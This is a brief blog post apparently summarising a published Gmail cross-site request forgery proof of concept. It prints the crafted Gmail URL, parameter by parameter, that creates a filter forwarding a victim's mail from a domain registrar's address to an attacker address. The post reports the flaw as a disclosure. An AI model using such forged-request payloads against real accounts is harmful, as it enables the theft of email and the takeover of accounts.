Geekcondition publish a article Gmail Security Flaw PoC. It's more to CSRF(Cross-site Request Forgery), and manipulating the Gmail live session. This happen when victim visiting malicious website while opening gmail.
Brandon from Geekcondition split out url to variable and look like this.
http://mail.google.com/mail/
?ui=2
&ik=ad7df7dc23 *Unique Account Identifier*
&at=xn3j35svndkg48yp2qgmpt99ivcqdc *Session Authorization Key*
&view=up
&act=cf
&rt=h
&zx=pjo6fg-k2ljzh&search=cf
&cf1_from=support%40godaddy.com
&cf2_emc=true&cf2_email=hacker%40hacker.com
&cf2_tr=true
Reference: http://geekcondition.com/2008/11/23/gmail-security-flaw-proof-of-concept/
Sality Links
1 day ago
0 comments:
Post a Comment